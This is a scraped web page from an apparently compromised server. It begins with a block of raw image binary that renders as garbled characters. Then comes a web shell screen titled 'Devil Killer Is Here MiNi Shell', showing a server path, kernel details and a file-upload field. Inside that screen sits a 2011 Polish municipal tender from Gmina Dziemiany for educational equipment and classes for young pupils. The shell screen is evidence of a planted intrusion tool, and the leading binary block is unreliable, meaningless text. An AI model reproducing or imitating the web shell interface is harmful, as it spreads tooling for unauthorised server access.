JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111208/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111208/323677-N-2011.html

<p class="kh_header"><b>Dziemiany: Doposażenie bazy dydaktycznej oraz przeprowadzenie specjalistycznych zajęć edukacyjnych wspierających indywidualizację procesu dydaktycznego, na poziomie właściwym dla nauczania w szkołach podstawowych w klasach I-III, w ramach projektu Wyrównanie szans edukacyjnych dzieci kl I-III szkół podstawowych Gminy Dziemiany</b><br>
<b>Numer ogłoszenia: 323677 - 2011; data zamieszczenia: 08.12.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Dziemiany , ul. 8 Marca 3, 83-425 Dziemiany, woj. pomorskie, tel. 058 6880022, faks 058 6880128.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.dziemiany.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Doposażenie bazy dydaktycznej oraz przeprowadzenie specjalistycznych zajęć edukacyjnych wspierających indywidualizację procesu dydaktycznego, na poziomie właściwym dla nauczania w szkołach podstawowych w klasach I-III, w ramach projektu Wyrównanie szans edukacyjnych dzieci kl I-III szkół podstawowych Gminy Dziemiany.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamówienie obejmuje:
1.	Doposażenie bazy dydaktycznej
W ramach projektu przewidziano zakup następujących przedmiotów:
1)	EduSensus Logopedia - pakiet poszerzony - program komputerowy - 2 szt.
2)	EduSensus  - terapia pedagogiczna - program komputerowy - 2 szt.
3)	EduSensus - dyslekcja - program komputerowy - 2 szt.
4)	Laptop - 2 szt.
Wymagania  minimalne: procesor czterordzeniowy, taktowanie rdzenia 2.66 GHz, SOCKED LGA 1156, system operacyjny 64-bit, przekątna ekranu 15,6 cali (1368x768), pamięć zainstalowana 4 GB, dysk twardy 320 GB SATA, napęd optyczny wbudowany DVD-RW, HDMI 1 szt., Złącza USB, złącze VGA, wbudowany LAN 100Mb, wbudowany WIRELESS LAN, czytnik kart, wbudowany Bluetooth v.3.0, dołączone podstawowe oprogramowanie biurowe, oprogramowanie antywirusowe, gwarancja - 24 mce

5)	Rzutnik multimedialny - 2 szt.
Wymagania  minimalne: rozdzielczość optyczna 800 x 600, rozdzielczość maksymalna 1600 x 1200, kontrast min 4500:1, jasność ANSI [lumen] 2500, proporcje obrazu 4:3, 16:9, wbudowane głośniki, moc głośników [W] min 5, korekcja zniekształceń Keystone W pionie /- 40 stopni, technologia obrazu DLP, żywotność lampy [h] 4500, moc lampy [W] min 160, żywotność lampy w trybie ECO: min 5000 h, głośność pracy: max 35 dB, wejście S-Video, HDMI, złącza komputerowe: D-sub, USB, RS-232C, wyposażenie: Pilot, Baterie do pilota, Kabel VGA ,Kabel zasilający, gwarancja (projektor/lampa) 36 miesięcy 

6)	Materiały pomocnicze (gry, układanki dydaktyczne, książki, art. biurowe i inne), które wykorzystane zostaną w ramach przeprowadzenia zajęć dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji - 2 komplety
7)	Materiały pomocnicze (gry, układanki dydaktyczne, książki, art. biurowe i inne), które wykorzystane zostaną w ramach przeprowadzenia zajęć dla dzieci ze specyficznymi trudnościami w zdobywaniu umiejętności matematycznych - 2 komplety
8)	Materiały pomocnicze (gry, układanki dydaktyczne, książki, art. biurowe i inne), które wykorzystane zostaną w ramach przeprowadzenia zajęć logopedycznych - 2 komplety
9)	Materiały pomocnicze (pomoce dydaktyczne, artykuły sportowe np. woreczki, ringo, piłki, piłeczki i inne), które wykorzystane zostaną w ramach przeprowadzenia zajęć gimnastyki korekcyjnej dla dzieci z wadami postawy - 2 komplety
10)	Materiały pomocnicze (gry, układanki, pomoce dydaktyczne, książki, art. biurowe i inne), które wykorzystane zostaną w ramach przeprowadzenia zajęć rozwijających zainteresowania i uzdolnienia matematyczno-przyrodnicze - 2 komplety
11)	Materiały pomocnicze (gry, układanki, pomoce dydaktyczne, książki, art. biurowe i inne), które wykorzystane zostaną w ramach przeprowadzenia zajęć socjoterapeutycznych dla dzieci - 2 komplety


2.	Przeprowadzenie specjalistycznych zajęć edukacyjnych na poziomie właściwym dla nauczania w szkołach podstawowych w klasach I-III

W ramach projektu przewidziano następujący zakres usług edukacyjnych:

1)  Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych
ryzykiem dysleksji - ogółem 210 godzin.
a)  ZKiW Dziemiany- SP - godzin, zajęcia dla 35 uczniów, 4 grupy, 4 godz. tygodniowo, razem 140 w roku szkolnym 2011/2012;
b)  SP Kalisz - zajęcia dla 15 uczniów, 2 grupy, 2 godz. tygodniowo, razem 70 godzin w roku szkolnym 2011/2012;
2)Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych - ogółem 140 godzin.
a)  ZKiW Dziemiany- SP - zajęcia dla 17 uczniów, 2 grupy, 2 godz. tygodniowo, razem 70 godzin w roku szkolnym  2011/2012;
b)  SP Kalisz - zajęcia dla 15 uczniów, 2 grupy, 2 godz. tygodniowo, razem 70 godzin w roku szkolnym 2011/2012;
3)  Zajęcia logopedyczne - ogółem 315 godzin.
a)  ZKiW Dziemiany- SP - zajęcia dla 21 uczniów, 6 grup, 6 godz. tygodniowo, razem 210 godzin w roku szkolnym 2011/2012;
b)  SP Kalisz - zajęcia dla 12 uczniów, 3 grupy, 3 godz. tygodniowo, razem 105 godzin w roku szkolnym 2011/2012;
4)  Gimnastyka korekcyjna dla dzieci z wadami postawy - ogółem 105 godzin.
a)  ZKiW Dziemiany- SP -zajęcia dla 24 uczniów, 3 grupy, 3 godz. tygodniowo, razem 105 godzin w roku szkolnym 2011/2012;
5)  Zajęcia rozwijające zainteresowania i uzdolnienia matematyczno-przyrodnicze -  ogółem 105 godzin.
a)  ZKiW Dziemiany- SP - zajęcia dla 12 uczniów, 2 grupy, 2 godz. tygodniowo, razem 70 godzin w roku szkolnym 2011/2012;
b)  SP Kalisz - zajęcia dla 10 uczniów, 1 grupa, 1 godz. tygodniowo, razem 35 godzin w roku szkolnym 2011/2012;
6)  Zajęcia socjoterapeutyczne dla dzieci - ogółem 105 godzin.
a)  ZKiW Dziemiany- SP - zajęcia dla 25 uczniów, 3 grupy, 3 godz. tygodniowo, razem 105 godzin w roku szkolnym 2011/2012;

3.	Bezpośrednim realizatorem usługi z ramienia Wykonawcy musza być osoby, które posiadają odpowiednie kwalifikacje dla zamówienia zgodnie z Rozporządzeniem Ministra Edukacji Narodowej z dnia 12 marca 2009 roku (Dz. U. z 2009 r. Nr 50 poz.400) w sprawie szczegółowych kwalifikacji wymaganych od nauczycieli oraz określenia szkół i wypadków, w których można zatrudnić nauczycieli niemających wyższego wykształcenia lub ukończonego zakładu kształcenia nauczycieli.
4.	Jedna godzina lekcyjna używana w SIWZ odpowiada 45 minutom.
5.	Wykonawca zamówienia będzie odpowiadał za przygotowanie, realizacje i dokumentacje zajęć indywidualizacyjnych dla uczniów. Do obowiązków Wykonawcy należało będzie m. in.:
a)  prowadzenie zajęć indywidualizacyjnych w godzinach dostosowanych do wymogów uczestników i warunków szkoły, po uzgodnieniu z dyrekcja szkoły; b)  dokumentowanie zajęć pozalekcyjnych (karty czasu pracy, dzienniki zajęć, dokumentacja zdjęciowa); 
c)  sporządzanie sprawozdań z realizacji zajęć;  prowadzenie i dokumentowanie zajęć zgodnie z zaleceniami Dyrektora Szkoły i   Koordynatora Projektu
d)  stała współpraca z dyrektorem szkoły, w której prowadzone będą zajęcia oraz koordynatorem projektu; 
e)  opracowanie programu i planu pracy zajęć indywidualizacyjnych obejmującego harmonogram oraz zakres zadania dla uczestników projektu i przedstawienia do akceptacji dyrektorowi szkoły i koordynatorowi projektu; 
f) dbałość oraz odpowiedzialność za zdrowie i bezpieczeństwo dzieci podczas zajęć.
g) dbałość o pomieszczenie, sprzęt i urządzenia wykorzystywane do realizacji projektu.
h) realizowanie zaleceń osób/ instytucji uprawnionych do kontroli projektu.
i) wykonywanie innych zadań związanych z poprawną realizacją projektu.
j) ochrona i przetwarzanie danych osobowych dzieci i rodziców/ prawnych opiekunów  zgodnie z ustawą z dnia 29.08.1997r. o ochronie danych osobowych (Dz.U. z 2002r. Nr 101, poz. 926 ze zm.) na podstawie imiennego upoważnienia wydanego przez zamawiającego..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5, 39.16.21.00-6, 39.16.21.20-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 29.06.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiajacy nie wymaga wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena tego warunku odbywać się będzie na podstawie zał. nr 2 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Formularz cenowy
2. Wykaz części zamówienia, których wykonanie Wykonawca zamierza powierzyć podwykonawcom</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania zmiany istotnych postanowień umowy zgodnie z art. 144 ust.1 ustawy Pzp 2).Zamawiający dopuszcza możliwość zmiany istotnych postanowień umowy dotyczących warunków płatności, terminu wykonania zamówienia, zakresu dostaw i usług w przypadku zaistnienia okoliczności, których Zamawiający nie mógł wcześniej przewidzieć lub, gdy wykonanie dostaw i usług jest niezbędne i konieczne na warunkach zaakceptowanych przez obie strony</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.dziemiany.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Dziemianach ul. 8-go Marca 3 83-425 Dziemiany.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.12.2011 godzina 10:00, miejsce: Urząd Gminy w Dziemianach ul. 8-go Marca 3 83-425 Dziemiany Pokój nr 14 (sekretariat)..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt  jest współfinansowany ze środków Europejskiego Funduszu Społecznego w ramach działania 9.1 Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, poddziałania 9.1.2 Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> 1.	Doposażenie bazy dydaktycznej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> W ramach projektu przewidziano zakup następujących przedmiotów:
1)	EduSensus Logopedia - pakiet poszerzony - program komputerowy - 2 szt.
2)	EduSensus  - terapia pedagogiczna - program komputerowy - 2 szt.
3)	EduSensus - dyslekcja - program komputerowy - 2 szt.
4)	Laptop - 2 szt.
Wymagania  minimalne: procesor czterordzeniowy, taktowanie rdzenia 2.66 GHz, SOCKED LGA 1156, system operacyjny 64-bit, przekątna ekranu 15,6 cali (1368x768), pamięć zainstalowana 4 GB, dysk twardy 320 GB SATA, napęd optyczny wbudowany DVD-RW, HDMI 1 szt., Złącza USB, złącze VGA, wbudowany LAN 100Mb, wbudowany WIRELESS LAN, czytnik kart, wbudowany Bluetooth v.3.0, dołączone podstawowe oprogramowanie biurowe, oprogramowanie antywirusowe, gwarancja - 24 mce

5)	Rzutnik multimedialny - 2 szt.
Wymagania  minimalne: rozdzielczość optyczna 800 x 600, rozdzielczość maksymalna 1600 x 1200, kontrast min 4500:1, jasność ANSI [lumen] 2500, proporcje obrazu 4:3, 16:9, wbudowane głośniki, moc głośników [W] min 5, korekcja zniekształceń Keystone W pionie /- 40 stopni, technologia obrazu DLP, żywotność lampy [h] 4500, moc lampy [W] min 160, żywotność lampy w trybie ECO: min 5000 h, głośność pracy: max 35 dB, wejście S-Video, HDMI, złącza komputerowe: D-sub, USB, RS-232C, wyposażenie: Pilot, Baterie do pilota, Kabel VGA ,Kabel zasilający, gwarancja (projektor/lampa) 36 miesięcy 

6)	Materiały pomocnicze (gry, układanki dydaktyczne, książki, art. biurowe i inne), które wykorzystane zostaną w ramach przeprowadzenia zajęć dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji - 2 komplety
7)	Materiały pomocnicze (gry, układanki dydaktyczne, książki, art. biurowe i inne), które wykorzystane zostaną w ramach przeprowadzenia zajęć dla dzieci ze specyficznymi trudnościami w zdobywaniu umiejętności matematycznych - 2 komplety
8)	Materiały pomocnicze (gry, układanki dydaktyczne, książki, art. biurowe i inne), które wykorzystane zostaną w ramach przeprowadzenia zajęć logopedycznych - 2 komplety
9)	Materiały pomocnicze (pomoce dydaktyczne, artykuły sportowe np. woreczki, ringo, piłki, piłeczki i inne), które wykorzystane zostaną w ramach przeprowadzenia zajęć gimnastyki korekcyjnej dla dzieci z wadami postawy - 2 komplety
10)	Materiały pomocnicze (gry, układanki, pomoce dydaktyczne, książki, art. biurowe i inne), które wykorzystane zostaną w ramach przeprowadzenia zajęć rozwijających zainteresowania i uzdolnienia matematyczno-przyrodnicze - 2 komplety
11)	Materiały pomocnicze (gry, układanki, pomoce dydaktyczne, książki, art. biurowe i inne), które wykorzystane zostaną w ramach przeprowadzenia zajęć socjoterapeutycznych dla dzieci - 2 komplety.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.16.21.00-6, 39.16.21.20-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> 2.	Przeprowadzenie specjalistycznych zajęć edukacyjnych na poziomie właściwym dla nauczania w szkołach podstawowych w klasach I-III.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> W ramach projektu przewidziano następujący zakres usług edukacyjnych:

1)  Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych
ryzykiem dysleksji - ogółem 210 godzin.
a)  ZKiW Dziemiany- SP - godzin, zajęcia dla 35 uczniów, 4 grupy, 4 godz. tygodniowo, razem 140 w roku szkolnym 2011/2012;
b)  SP Kalisz - zajęcia dla 15 uczniów, 2 grupy, 2 godz. tygodniowo, razem 70 godzin w roku szkolnym 2011/2012;
2)Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych - ogółem 140 godzin.
a)  ZKiW Dziemiany- SP - zajęcia dla 17 uczniów, 2 grupy, 2 godz. tygodniowo, razem 70 godzin w roku szkolnym  2011/2012;
b)  SP Kalisz - zajęcia dla 15 uczniów, 2 grupy, 2 godz. tygodniowo, razem 70 godzin w roku szkolnym 2011/2012;
3)  Zajęcia logopedyczne - ogółem 315 godzin.
a)  ZKiW Dziemiany- SP - zajęcia dla 21 uczniów, 6 grup, 6 godz. tygodniowo, razem 210 godzin w roku szkolnym 2011/2012;
b)  SP Kalisz - zajęcia dla 12 uczniów, 3 grupy, 3 godz. tygodniowo, razem 105 godzin w roku szkolnym 2011/2012;
4)  Gimnastyka korekcyjna dla dzieci z wadami postawy - ogółem 105 godzin.
a)  ZKiW Dziemiany- SP -zajęcia dla 24 uczniów, 3 grupy, 3 godz. tygodniowo, razem 105 godzin w roku szkolnym 2011/2012;
5)  Zajęcia rozwijające zainteresowania i uzdolnienia matematyczno-przyrodnicze -  ogółem 105 godzin.
a)  ZKiW Dziemiany- SP - zajęcia dla 12 uczniów, 2 grupy, 2 godz. tygodniowo, razem 70 godzin w roku szkolnym 2011/2012;
b)  SP Kalisz - zajęcia dla 10 uczniów, 1 grupa, 1 godz. tygodniowo, razem 35 godzin w roku szkolnym 2011/2012;
6)  Zajęcia socjoterapeutyczne dla dzieci - ogółem 105 godzin.
a)  ZKiW Dziemiany- SP - zajęcia dla 25 uczniów, 3 grupy, 3 godz. tygodniowo, razem 105 godzin w roku szkolnym 2011/2012;

3.	Bezpośrednim realizatorem usługi z ramienia Wykonawcy musza być osoby, które posiadają odpowiednie kwalifikacje dla zamówienia zgodnie z Rozporządzeniem Ministra Edukacji Narodowej z dnia 12 marca 2009 roku (Dz. U. z 2009 r. Nr 50 poz.400) w sprawie szczegółowych kwalifikacji wymaganych od nauczycieli oraz określenia szkół i wypadków, w których można zatrudnić nauczycieli niemających wyższego wykształcenia lub ukończonego zakładu kształcenia nauczycieli.
4.	Jedna godzina lekcyjna używana w SIWZ odpowiada 45 minutom.
5.	Wykonawca zamówienia będzie odpowiadał za przygotowanie, realizacje i dokumentacje zajęć indywidualizacyjnych dla uczniów. Do obowiązków Wykonawcy należało będzie m. in.:
a)  prowadzenie zajęć indywidualizacyjnych w godzinach dostosowanych do wymogów uczestników i warunków szkoły, po uzgodnieniu z dyrekcja szkoły; b)  dokumentowanie zajęć pozalekcyjnych (karty czasu pracy, dzienniki zajęć, dokumentacja zdjęciowa); 
c)  sporządzanie sprawozdań z realizacji zajęć;  prowadzenie i dokumentowanie zajęć zgodnie z zaleceniami Dyrektora Szkoły i   Koordynatora Projektu
d)  stała współpraca z dyrektorem szkoły, w której prowadzone będą zajęcia oraz koordynatorem projektu; 
e)  opracowanie programu i planu pracy zajęć indywidualizacyjnych obejmującego harmonogram oraz zakres zadania dla uczestników projektu i przedstawienia do akceptacji dyrektorowi szkoły i koordynatorowi projektu; 
f) dbałość oraz odpowiedzialność za zdrowie i bezpieczeństwo dzieci podczas zajęć.
g) dbałość o pomieszczenie, sprzęt i urządzenia wykorzystywane do realizacji projektu.
h) realizowanie zaleceń osób/ instytucji uprawnionych do kontroli projektu.
i) wykonywanie innych zadań związanych z poprawną realizacją projektu.
j) ochrona i przetwarzanie danych osobowych dzieci i rodziców/ prawnych opiekunów  zgodnie z ustawą z dnia 29.08.1997r. o ochronie danych osobowych (Dz.U. z 2002r. Nr 101, poz. 926 ze zm.) na podstawie imiennego upoważnienia wydanego przez zamawiającego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.06.2012.</p></li>
